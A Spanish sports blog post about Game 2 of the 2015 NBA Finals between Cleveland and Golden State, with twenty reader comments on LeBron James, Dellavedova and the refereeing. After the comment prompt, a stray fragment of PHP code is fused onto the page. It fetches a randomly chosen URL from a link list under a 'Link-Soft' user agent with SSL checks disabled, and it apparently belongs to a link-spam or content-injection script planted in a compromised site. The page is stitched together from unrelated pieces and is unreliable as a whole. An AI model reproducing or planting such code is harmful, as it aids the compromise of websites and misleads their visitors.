La Crónica: ¡Al barro!

08 de June de 2015 por txusma

Los Cavs sabían que con las bajas de Kevin Love y Kyrie Irving solo podían (y pueden) ganar a los Warriors de una manera: convirtiendo el partido en una guerra de trincheras, obligando a los jugadores californianos a ensuciarse, despreocupándose del espectáculo y mordiendo en cada rebote y en cada balón dividido. Y si hay un jugador que se siente cómodo en estas visicitudes es el australiano Mathew Dellavedova, odiado por sus rivales, amado por cualquier aficionado de los Cavaliers. Anotó sólo 9 puntos pero todos en el último cuarto y en la prórroga, incluidos los 2 tiros libres que acabaron dando la victoria a los suyos a apenas 10 segundos para el final. Esos tiros libres se los había ganado, atención, tras coger un rebote en ataque ante los juegos interiores de ambos equipos. Como decía un compañero: “A tener huevos no le gana nadie”. Pero si destacable fue su labor ofensiva, más aún lo fue la defensiva. Con la ayuda de todos sus compañeros pero con él como artista principal, volvió loco a Stephen Curry y le empujó a una de sus peores noches como profesional y a una de las peores actuaciones de un MVP en unas finales: 5 de 23 en TC, 2 de 13 en T3, 6 pérdidas… En cambio, Klay Thompson se aprovechó del control sobre su compañero y se fue a los 34 puntos pero poco más aportaron sus compañeros ofesnviamente. Especialmente sangrante es el caso de Andrew Bogut, absolutamente dominado por Timofey Mozgov. Por ahí están empezando a perder los Warriors. 

Evidentemente, no vamos a acabar la crónica sin nombrar a Lebron James. Tras la lesión de Kyrie Irving se comentaba que muy bien debería estar “The King” para que los suyos tuvieran una oportunidad pero lo cierto es que los Cavs se han acabado llevando la victoria con Lebron anotando 11 de sus 35 lanzamientos a canasta. Acabó con 39 puntos, 16 rebotes y 11 asistencias pero cometió un par de pérdidas en los últimos minutos del tiempo regular que pudieron resultar fatales y que de hecho, permitieron a los Warriors forzar la prórroga a pesar de verse 11 puntos abajo a falta de sólo 3 minutos y 14 segundos. De todas maneras, Lebron parece haber asumido también que esta guerra va a ser dura y fea y que va a disponer del mayor número de aclarados que ha podido tener en toda su vida deportiva. Seguramente sus porcentajes no van a ser muy brillantes pero mientras siga dominando como lo hace el ritmo de los partidos los Cavaliers van a tener oportunidades a poco que sus compañeros acompañen. Ojo que hay final.

Comenta

20 comentarios a esta entrada

  1. FRANCHO dice:
    #1

    Alguien entiende porque Mozgov que era una constante pesadilla para Warriors no jugo nada desde que se sentó al final del tercer cuarto? porque Thompson tampoco es que en defensa marcase tanta diferencia y en ataque es mas un estorbo

      Citar

  2. Txusma dice:
    #2

    FRANCHO:
    Alguien entiende porque Mozgov que era una constante pesadilla para Warriors no jugo nada desde que se sentó al final del tercer cuarto? porque Thompson tampoco es que en defensa marcase tanta diferencia y en ataque es mas un estorbo

    Supongo que empezó el cuarto en el banquillo por un tema de descanso y luego ya no saltó a la cancha porque Bogut se sentó y no volvió a disputar ni un minuto.

    Yo lo q veo increible aunque inevitable visto como ha ido todo es que James Jones (¡James Jones!) juegue 22 minutos en un partido de las finales.

      Citar

  3. Vader dice:
    #3

    Que bien les hubiera venido Ray Allen ahora mismo a los Cavs.

    Tremendo Lebron y tremendo los Cavs llevandose un 1-1 y con prorroga en el primer partido. No me quiero imaginar que se puedan llevar las finales, pero visto lo visto podria pasar, seria una de las actuaciones individuales más grandes en la historia de la liga en unos playoff.

    El tercero será crucial, si se ponen Cavs 2-1… Creo que ha Cavs le convine una serie corta, no creo que Lebron aguanté 7 partidos a este nivel…

    Saludos!!

      Citar

  4. dsromero dice:
    #4

    coincido totalmente en lo de que los Cavs necesitarían una serie corta, de momento lo más difícil ya lo han hecho

    de todos modos sigo pensando que GS va a llevarse la final, van a ganar el 3º seguro

      Citar

  5. Ruxixón dice:
    #5

    ¡Siii!Pensaba que pasaría como en el primer partido,que tras mucho remar nos íbamos a quedar en la orilla,pero creo que es más que justo el 1-1 que lleva ahora la serie.Casi me cago en JR,vaya 2 faltas estúpidas para complicar el partido.Es la primera vez que le veo con sus tonterías desde que está en los Cavs.

    Delly es la leche,sé que Jose Luis lo tiene como el nuevo Bruce Bowen,pero por mi parte lo tengo en otra prisma de jugador.Mucha entrega pero sin cruzar la línea roja,y hoy ha secado a todo un MVP y uno de los jugadores más indefendibles que hay.Un poco de desazón por el caserismo arbitral,en el primer partido le pitaron pasos a Mozgov en un reverso y un fuera a Cleveland que era falta sobre LeBron,en los minutos finales,y hoy tranquilamente podían haber pitado de Iguodala sobre LeBron al final del tiempo regular,otra falta -si bien eran pasos- clarísima en el brazo en el 2 contra 1 sobre él,falta de Draymond Green en el salto entre 2…todo en los minutos finales.

    En fin,hay al menos 5º partido,con el precedente de los 2 primeros con prórroga,queda espectáculo para rato.

    Me voy a celebrar el ascenso del Sporting!! 😛

      Citar

  6. melo15 dice:
    #6

    Triple doble de Lebron pero con unos porcentajes pésimos incluyendo un 2 de 11 en el último cuarto y la prorroga…
    Creo que se está sobrevalorando mucho la actuacion de Lebron en estos dos primeros partidos. Es verdad que esta firmando unos numeros escandalosos pero sus porcentajes y decisiones en ataque están siendo bastante mejorables.

    PD: Cuando otros jugadores como Melo o Kobe meten 30 puntos a costa de intentar 30 tiros se les critica de chupones, de amasar la pelota, de no saber delegar responsabilidades…

      Citar

  7. Futurman dice:
    #7

    La diferencia reside en que tira tanto por que no hay otro. Eso si, deberían darle descanso en el tercer cuarto, por que en el último necesita bombona.

      Citar

  8. melo15 dice:
    #8

    Iverson tambien tiraba porque no habia otro y en ente blog se le ha dado por todos lados…

      Citar

  9. Viva_Dirk dice:
    #9

    Iverson ya es malo por si solo, si lo comparas con este LeBron es directamente una mierda.

      Citar

  10. Vader dice:
    #10

    Viva_Dirk:
    Iverson ya es malo por si solo, si lo comparas con este LeBron es directamente una mierda.

    ¿Tu viste jugar a Iverson?

    Madre mía lo que hay que leer a veces…

      Citar

  11. Jose Luis dice:
    #11

    Los warriors perdiendo el partido 3-4-5 veces con acciones absurdas…

      Citar

  12. Jose Luis dice:
    #12

    Vaya entrada de fútbol de James a Curry… y no la pitan xD

      Citar

  13. Jose Luis dice:
    #13

    Los Warriors abusando de Curry como ball-hander… pocos quieren responsabilidades.

      Citar

  14. Jose Luis dice:
    #14

    Lo más leido en twitter ahora mismo, lo de LeBron era tarjeta amarilla 😀

    Y nueva pérdida de Warriors en saque lateral

    innumerables errores de los dos equipos… vaya final de cuarto XD

      Citar

  15. Jose Luis dice:
    #15

    y con los al menos 10 errores que han tenido los warriors en este cuarto… solo 4 abajo a falta de 29 segundos

      Citar

  16. Jose Luis dice:
    #16

    Lo que tienen que sudar Cavs para ganar a unos Warriors espeluznantes.. Esa es la esperanza de GS.

      Citar

  17. Jose Luis dice:
    #17

    vaya 3+1 se han comido los arbitros a 1 metro de Curry…

      Citar

  18. Jose Luis dice:
    #18

    Final. Creo que se han comido otro par de faltas, pero bien pitado el out of bounds de Klay Thompson

    les falta instinto ganador por un tubo a estos Warriors… juegan para echar el rato, no tienen instinto de ir a arrollar o a ganar… fruto de que en regular season se han paseado casi siempre supongo

      Citar

  19. Vader dice:
    #19

    Madre mía como se ponen las finales. No se que día se juega el game 4 pero voy a intentar verlo en directo porque va a ser de infarto, los warriors se tienen que llevar el 2-2 porque si no con 3-1 y Lebron a este nivel apaga y vamonos…

    A nivel histórico como ganen este año el anillo los Cavs ¿Cuantos puede llegar a ganar Lebron? Tiene 30 años y el año que viene la plantilla de los Cavs va a dar mucho miedo, Irving recuperado, Love de vuelta, Varejao, la primera ronda que tienen este año más todo lo que estan mostrando en estas finales. Un equipo para marcar una época.

    Saludos

      Citar

  20. Jose Luis dice:
    #20

    Yo creo que a los Warriors les ha venido hasta mal las bajas de los Cavs, porque Irving y Love hubieran tenido un nivel defensivo bastante más flojo.

    De todas formas, parece lo de todos los Play-Offs y toda la regular season, GSW sale a ver como va el partido, lo que pasa es que generalmente les suele ir bien… necesitan reencontrarse y recordar como vencieron a Memphis y ponerse a intentar ganar de verdad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>